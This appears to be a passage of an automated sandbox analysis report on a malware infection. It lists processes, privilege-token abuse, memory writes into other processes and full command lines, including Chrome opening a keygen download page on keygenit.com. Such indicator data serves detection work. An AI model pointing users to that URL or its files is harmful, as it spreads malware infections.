chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exerundll32.exesvchost.exeultramediaburner.tmpQepirewoby.exe

pid	process
3868	chrome.exe
3868	chrome.exe
784	chrome.exe
784	chrome.exe
4584	chrome.exe
4584	chrome.exe
4424	chrome.exe
4424	chrome.exe
5220	chrome.exe
5220	chrome.exe
5556	chrome.exe
5556	chrome.exe
5600	chrome.exe
5600	chrome.exe
5776	chrome.exe
5776	chrome.exe
4128	rundll32.exe
4128	rundll32.exe
1816	svchost.exe
1816	svchost.exe
5068	ultramediaburner.tmp
5068	ultramediaburner.tmp
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe
4312	Qepirewoby.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3052

pid	process
3052

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

MicrosoftEdgeCP.exetoolspab1.exec7ae36fa.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
5360	MicrosoftEdgeCP.exe
5360	MicrosoftEdgeCP.exe
5448	toolspab1.exe
5920	c7ae36fa.exe
5360	MicrosoftEdgeCP.exe
3052
3052
3052
3052
3052
3052
3052
3052
6168	explorer.exe
6168	explorer.exe
6168	explorer.exe
6168	explorer.exe
3052
3052
6168	explorer.exe
6168	explorer.exe
6168	explorer.exe
6168	explorer.exe
3052
3052
1840	explorer.exe
1840	explorer.exe
6168	explorer.exe
6168	explorer.exe
6168	explorer.exe
6168	explorer.exe
3052
3052
6168	explorer.exe
6168	explorer.exe
3052
3052
6268	explorer.exe
6268	explorer.exe
1840	explorer.exe
1840	explorer.exe
3052
3052
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
6168	explorer.exe
6168	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
1840	explorer.exe
6268	explorer.exe
6268	explorer.exe
6268	explorer.exe
6268	explorer.exe
6268	explorer.exe
6268	explorer.exe
6268	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rundll32.exesvchost.exeJoSetp.exetaskkill.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeTcbPrivilege	1816	svchost.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	5116	JoSetp.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	4128	rundll32.exe
Token: SeDebugPrivilege	5452	taskkill.exe
Token: SeAssignPrimaryTokenPrivilege	2688	svchost.exe
Token: SeIncreaseQuotaPrivilege	2688	svchost.exe
Token: SeSecurityPrivilege	2688	svchost.exe
Token: SeTakeOwnershipPrivilege	2688	svchost.exe
Token: SeLoadDriverPrivilege	2688	svchost.exe
Token: SeSystemtimePrivilege	2688	svchost.exe
Token: SeBackupPrivilege	2688	svchost.exe
Token: SeRestorePrivilege	2688	svchost.exe
Token: SeShutdownPrivilege	2688	svchost.exe
Token: SeSystemEnvironmentPrivilege	2688	svchost.exe
Token: SeUndockPrivilege	2688	svchost.exe
Token: SeManageVolumePrivilege	2688	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2688	svchost.exe
Token: SeIncreaseQuotaPrivilege	2688	svchost.exe
Token: SeSecurityPrivilege	2688	svchost.exe
Token: SeTakeOwnershipPrivilege	2688	svchost.exe
Token: SeLoadDriverPrivilege	2688	svchost.exe
Token: SeSystemtimePrivilege	2688	svchost.exe
Token: SeBackupPrivilege	2688	svchost.exe
Token: SeRestorePrivilege	2688	svchost.exe
Token: SeShutdownPrivilege	2688	svchost.exe
Token: SeSystemEnvironmentPrivilege	2688	svchost.exe
Token: SeUndockPrivilege	2688	svchost.exe
Token: SeManageVolumePrivilege	2688	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2688	svchost.exe
Token: SeIncreaseQuotaPrivilege	2688	svchost.exe
Token: SeSecurityPrivilege	2688	svchost.exe
Token: SeTakeOwnershipPrivilege	2688	svchost.exe
Token: SeLoadDriverPrivilege	2688	svchost.exe
Token: SeSystemtimePrivilege	2688	svchost.exe
Token: SeBackupPrivilege	2688	svchost.exe
Token: SeRestorePrivilege	2688	svchost.exe
Token: SeShutdownPrivilege	2688	svchost.exe
Token: SeSystemEnvironmentPrivilege	2688	svchost.exe
Token: SeUndockPrivilege	2688	svchost.exe
Token: SeManageVolumePrivilege	2688	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2688	svchost.exe
Token: SeIncreaseQuotaPrivilege	2688	svchost.exe
Token: SeSecurityPrivilege	2688	svchost.exe
Token: SeTakeOwnershipPrivilege	2688	svchost.exe
Token: SeLoadDriverPrivilege	2688	svchost.exe
Token: SeSystemtimePrivilege	2688	svchost.exe
Token: SeBackupPrivilege	2688	svchost.exe
Token: SeRestorePrivilege	2688	svchost.exe
Token: SeShutdownPrivilege	2688	svchost.exe
Token: SeSystemEnvironmentPrivilege	2688	svchost.exe
Token: SeUndockPrivilege	2688	svchost.exe
Token: SeManageVolumePrivilege	2688	svchost.exe

Suspicious use of FindShellTrayWindow 22 IoCs

Processes:

chrome.exeultramediaburner.tmp

pid	process
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
784	chrome.exe
5068	ultramediaburner.tmp
3052
3052
3052
3052

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

xiuhuali.exeMicrosoftEdge.exeMicrosoftEdgeCP.exegoogle-game.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
4808	xiuhuali.exe
4808	xiuhuali.exe
4260	MicrosoftEdge.exe
5360	MicrosoftEdgeCP.exe
5360	MicrosoftEdgeCP.exe
5832	google-game.exe
5832	google-game.exe
6924	MicrosoftEdge.exe
1016	MicrosoftEdgeCP.exe
1016	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3052

pid	process
3052

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 784 wrote to memory of 520	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 520	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3532	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3868	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3868	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe
PID 784 wrote to memory of 3600	784	chrome.exe	chrome.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1884

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe0b864f50,0x7ffe0b864f60,0x7ffe0b864f70
2⤵
PID:520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1600 /prefetch:2
2⤵
PID:3532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1788 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3868

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 /prefetch:8
2⤵
PID:3600

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
2⤵
PID:2136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
2⤵
PID:924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
2⤵
PID:3984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
2⤵
PID:2348

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
2⤵
PID:2608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
2⤵
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:8
2⤵
PID:4356

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
2⤵
PID:4816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:8
2⤵
PID:4872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
2⤵
PID:4892

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:8
2⤵
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
2⤵
PID:4964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
2⤵
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
2⤵
PID:5060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
2⤵
PID:5084

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
2⤵
PID:5108

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x21c,0x248,0x7ff6507aa890,0x7ff6507aa8a0,0x7ff6507aa8b0
3⤵
PID:4328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:8
2⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:8
2⤵
PID:4400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8
2⤵
PID:4556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5840 /prefetch:8
2⤵
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:8
2⤵
PID:4580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:8
2⤵
PID:4588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5844 /prefetch:8
2⤵
PID:4740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:8
2⤵
PID:4736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
2⤵
PID:4848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7008 /prefetch:8
2⤵
PID:4916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7032 /prefetch:8
2⤵
PID:4884

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7136 /prefetch:8
2⤵
PID:4924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7148 /prefetch:8
2⤵
PID:4908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7160 /prefetch:8
2⤵
PID:4992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6984 /prefetch:8
2⤵
PID:5048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:8
2⤵
PID:3188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:8
2⤵
PID:4952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
2⤵
PID:1584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:8
2⤵
PID:2320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8044 /prefetch:8
2⤵
PID:3832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8160 /prefetch:8
2⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7048 /prefetch:8
2⤵
PID:4940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8416 /prefetch:8
2⤵
PID:4900

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8548 /prefetch:8
2⤵
PID:3080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8560 /prefetch:8
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
